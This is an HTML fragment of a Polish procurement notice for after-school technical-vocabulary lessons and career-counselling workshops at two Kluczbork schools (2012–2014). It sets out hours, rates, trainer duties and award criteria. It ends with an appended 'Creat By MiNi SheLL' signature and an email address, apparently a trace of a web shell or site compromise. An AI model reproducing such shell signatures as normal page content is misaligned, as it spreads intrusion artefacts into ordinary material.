<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje 40 godzin zajęć pozalekcyjnych na grupę i obejmować będzie 4 grupy 10 - cio osobowe w okresie od września 2012r. do czerwca 2014r.
Program nauczania obejmuje nazewnictwo maszyn i urządzeń, procesów obróbczych, części maszyn oraz umiejętność czytania dokumentacji technicznej i instrukcji. Zajęcia odbywać się będą w godzinach popołudniowych w Zespole Szkół Ponadgimnazjalnych  nr 2 CKU w Kluczborku oraz w Zespole Szkół Licealno-Technicznych w Kluczborku.
Łączna liczba godzin w okresie realizacji projektu wynosi 160 godzin lekcyjnych. 
(1 godzina  lekcyjna równa się 45 min).
Zamawiający może przeznaczyć na realizację zadania środki w wysokości, brutto 100,00 zł za godzinę przeprowadzonych zajęć. Powyższa cena nie obejmuje materiałów poglądowych i szkoleniowych.
Prowadzący zajęcia pozalekcyjne będzie odpowiadał za:
1) przeprowadzenie wśród uczniów dostarczonych przez koordynatora ankiet badających zaspokojenie oczekiwań i jakości zajęć i wykorzystywanych materiałów dydaktycznych, ocenę umiejętności wykładowców i sposób prowadzenia zajęć;
2) przeprowadzenie testów sprawdzających wiedzę uczniów raz na kwartał, oraz ich weryfikację 
3) przygotowanie, realizację i dokumentację zajęć dla uczniów (w tym zobowiązany będzie do wypełniania Dziennika zajęć; W przypadku realizacji zadań w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia wymaga się, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia oraz, że łączne zaangażowanie w realizację zadań projektowych nie przekracza 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania- dot. osób prowadzących zajęcia).
4) dbanie i prawidłowe korzystanie ze sprzętu wykorzystywanego do prowadzenia zajęć będącego na stanie szkół;
5) przestrzeganie regulaminu sali/pomieszczenia, w którym będą prowadzone zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.58.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARSZTATY DORADZTWA EDUKACYJNO-ZAWODOWEGO ZADBAJ O SWOJĄ PRZYSZŁOŚĆ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje 20 godzin zajęć pozalekcyjnych na grupę. W szkoleniu będzie uczestniczyć 40 uczniów w podziale na 4 grupy 10- cio osobowe w okresie od września 2012r. do czerwca 2014r.  Program zajęć: rozmowy indywidualne z uczestnikami projektu w celu rozpoznania ewentualnych problemów, treningi asertywności, umiejętności interpersonalnych i umiejętności społecznych a także obejmuje możliwości planowania przyszłości edukacyjnej i/lub zawodowej. Warsztaty odbywać się będą w godzinach popołudniowych w Zespole Szkół Ponadgimnazjalnych  nr 2 CKU w Kluczborku oraz w Zespole Szkół Licealno-Technicznych w Kluczborku.
Łączna liczba godzin w okresie realizacji projektu wynosi 80 godzin lekcyjnych. 
(1 godzina lekcyjna równa się 45 min). Zamawiający może przeznaczyć na realizację zadania środki w wysokości, brutto 100,00 zł za godzinę przeprowadzonych zajęć. Powyższa cena nie obejmuje materiałów poglądowych i szkoleniowych.
Osoba prowadząca zajęcia pozalekcyjne będzie odpowiadała za:
1)przeprowadzenie wśród uczniów dostarczonych przez koordynatora ankiet badających zaspokojenie oczekiwań i jakości zajęć i wykorzystywanych materiałów dydaktycznych, ocenę umiejętności wykładowców i sposób prowadzenia zajęć;
2)przygotowanie, realizację i dokumentację zajęć dla uczniów (w tym zobowiązany będzie do wypełniania Dziennika zajęć; W przypadku realizacji zadań w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia wymaga się, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia oraz, że łączne zaangażowanie w realizację zadań projektowych nie przekracza 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania- dot. osób prowadzących zajęcia). 

3)dbanie i prawidłowe korzystanie ze sprzętu wykorzystywanego do prowadzenia zajęć będącego na stanie szkół;
4)   przestrzeganie regulaminu sali/pomieszczenia, w którym będą prowadzone zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com